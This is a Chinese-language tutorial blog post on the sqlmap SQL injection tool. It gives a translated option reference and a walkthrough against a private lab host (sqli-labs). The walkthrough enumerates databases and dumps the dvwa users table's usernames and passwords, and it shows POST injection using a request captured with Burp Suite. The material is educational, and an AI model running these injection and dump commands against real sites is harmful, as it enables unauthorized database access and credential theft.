文章目录

  • sqlmap手册
  • sqlmap实战演示
    • 探测注入点
    • 列出所有数据库
    • 列出指定数据库表
    • 查询指定表内字段
    • 查询字段中的内容
    • post方法

sqlmap手册

slqmap常用使用方法Usage: python sqlmap [options]Options:-h, --help            帮助-hh                   帮助--version             sqlmap版本-v VERBOSE            显示Verbosity level: 0-6 (default 1)探测目标:-u URL, --url=URL   探测目标Target URL (e.g. "http://www.site.com/vuln.php?id=1")-r REQUESTFILE      加载请求文件,通常post-g GOOGLEDORK       Process Google dork results as target URLs请求参数:--data=DATA         Data string to be sent through POST--cookie=COOKIE     HTTP Cookie header value--random-agent      Use randomly selected HTTP User-Agent header value--proxy=PROXY       Use a proxy to connect to the target URL--tor               Use Tor anonymity network--check-tor         Check to see if Tor is used properly-p TESTPARAMETER    指定探测参数Testable parameter(s)--dbms=DBMS         指定数据库类型--dbms=mysql--level=LEVEL       探测级别 (1-5, default 1)
--risk=RISK         风险等级 (1-3, default 1)--technique=TECH    注入技术(default "BEUSTQ")-a, --all           Retrieve everything-b, --banner        Retrieve DBMS banner--current-user      当前用户--current-db        当前数据库--passwords         Enumerate DBMS users password hashes--tables            Enumerate DBMS database tables--columns           Enumerate DBMS database table columns--schema            Enumerate DBMS schema--dump              保存数据到文件Dump DBMS database table entries--dump-all          Dump all DBMS databases tables entries-D DB               -D  数据库名-T TBL              -T  表名-C COL              -C  字段名1,2...--os-shell          Prompt for an interactive operating system shell--os-pwn            Prompt for an OOB shell, Meterpreter or VNC--batch             不询问,按默认行为--flush-session     刷新会话文件,Flush session files for current target--sqlmap-shell      Prompt for an interactive sqlmap shell--wizard            Simple wizard interface for beginner users--threads=THREADS 线程数如 threads 5 (default 1)

sqlmap实战演示

探测注入点

sqlmap -u "http://192.168.199.100/sqli/Less-1/?id=1" --batch --threads=10

显示结果

列出所有数据库

sqlmap -u "http://192.168.199.100/sqli/Less-1/?id=1" --dbs --batch --threads=10

列出指定数据库表

sqlmap -u "http://192.168.199.100/sqli/Less-1/?id=1" -D dvwa --tables --batch --threads=10

查询指定表内字段

sqlmap -u "http://192.168.199.100/sqli/Less-1/?id=1" -D dvwa -T users --columns --batch --threads=10

查询字段中的内容

sqlmap -u "http://192.168.199.100/sqli/Less-1/?id=1" -D dvwa -T users -C "user,password" --dump --batch --threads=10

–dump 会被保存下来

post方法

用burpsuite截断请求,复制请求信息,写入re.txt

  1. burpsuite开启代理设置

  2. 浏览器设置代理

  3. 浏览器访问对应web注入点

  4. 在burp上复制截断的请求,保存到re.txt文件

  5. 执行sql注入命令
    -r 加载请求的文件,-p携带注入参数

sqlmap -r "re.txt" -p "uname"  --current-db --batch --threads=10

显示结果

sqlmap常用使用方法相关推荐

  1. 使用TkMybatis逆向生成带中文注释文件,并使用其常用的方法

    首先说明,博主用的是springboot,如使用原生态的mybatis的一些配置文件请自行百度 贴上pom文件 <?xml version="1.0" encoding=&q ...

  2. Web安全工具—Sqlmap常用命令和参数(持续更新)

    Web安全工具-SQLMAP常用命令和参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习. 一:SQLMAP介绍: 简介:sqlmap是一个由p ...

  3. 2022 全球网络黑客常用攻击方法 Top10

    近几年,借助互联网产业发展的东风,网络黑产也迎来更加巅峰的状态,不论是从攻击效率,组织规模,亦或是收益变现能力,都在一天天变的成熟完善.根据艾瑞咨询 2020 年发布的<现代网络诈骗分析报告&g ...

  4. 渗透测试-SQL注入之sqlmap的使用方法及实战案例

    SQL注入之sqlmap的使用方法及实战案例 文章目录 SQL注入之sqlmap的使用方法及实战案例 前言 一.sqlmap的使用方法 查库,表,列,以及相关的字段的信息 万能密码汇总 判断是否为字符 ...

  5. 2022 全球网络黑产常用攻击方法 Top 10

    近几年,借助互联网产业发展的东风,网络黑产也迎来更加巅峰的状态,不论是从攻击效率,组织规模,亦或是收益变现能力,都在一天天变的成熟完善.根据艾瑞咨询 2020 年发布的<现代网络诈骗分析报告&g ...

  6. android屏幕密度高度,Android获取常用辅助方法(获取屏幕高度、宽度、密度、通知栏高度、截图)...

    我们需要获取Android手机或Pad的屏幕的物理尺寸,以便于界面的设计或是其他功能的实现.下面就分享一下Android中常用的一些辅助方法: 获取屏幕高度: /** * 获得屏幕高度 * @para ...

  7. 多线程2(常用的方法:join、interrupt、currentThread、isAlive、setDaemon...)

    常用的方法: 1.join()方法: join()方法:执行该方法的线程进入阻塞状态,直到调用该方法的线程结束后再由阻塞状态转为就绪状态. 示例: package venus;import java. ...

  8. 基于 Python 的 8 种常用抽样方法

    抽样是统计学.机器学习中非常重要,也是经常用到的方法,因为大多时候使用全量数据是不现实的,或者根本无法取到.所以我们需要抽样,比如在推断性统计中,我们会经常通过采样的样本数据来推断估计总体的样本. 上 ...

  9. 病理分析常见数据集及常用模型方法总结

    病理分析常见数据集及常用模型方法总结 目录 病理分析常见数据集 病理图像分类常见处理方法 病理图像常见数据集详细说明 相关论文梳理

最新文章

  1. java编写socket使用bufferedReader.readLine()问题研究
  2. web 点击劫持 X-Frame-Options
  3. 【运筹学】线性规划数学模型 ( 单纯形法 | 第一次迭代 | 方程组同解变换 | 计算新单纯形表 | 计算检验数 | 入基变量选择 | 出基变量选择 )
  4. [云炬python3玩转机器学习笔记] 1-3课程所使用的主要技术栈
  5. Linux CentOS 7 YouCompleteMe相关配置。
  6. Sentinel 源码分析(一)
  7. pip install时发生raise ReadTimeoutError(self._pool, None, 'Read timed out.')的解决方案
  8. oracle数据库read only,oracle 报错Linux-x86_64 Error: 30: Read-only file system
  9. fastreport dll_报表如何连接到VistaDB嵌入式数据库?FastReport.Net轻松搞定
  10. 数据结构之外部排序:最佳归并树
  11. 关于Spring注解开发教程,打包全送你
  12. php 禁止ajax 重复请求,js ajax请求防止重复提交
  13. 对动画队列的初步了解
  14. AMESim软件包 百度云下载
  15. win10 java8 环境变量_win10下安装JDK8和环境变量配置
  16. 如何用latex高效写毕业论文(超简明+实用经验分享)
  17. PICKIT3 WIN10 无法连接问题解决
  18. C#中DataTime.Now函数详解
  19. java.sql.SQLException: The server time zone value 'XXX' is unrecognized or represents more tha
  20. ImageMagicK之合成图片

热门文章

  1. 弘辽科技:抖音直播可不可以刷单?刷单有用吗?
  2. 关于Sass与Compass的一些笔记
  3. 计算机仿真宇宙,整个宇宙就是一台巨型量子计算机!俄新研究颠覆宇宙学理论...
  4. 22.1.30总结反思
  5. ​SCMP供应链管理认知
  6. 去看李记者,天津印象
  7. 四、【python计算机视觉编程】照相机模型与增强现实
  8. 设置a标签链接字体的颜色
  9. Java使用POI实现Word合同打印下载功能
  10. python plc_基于python的西门子plc数据采集系统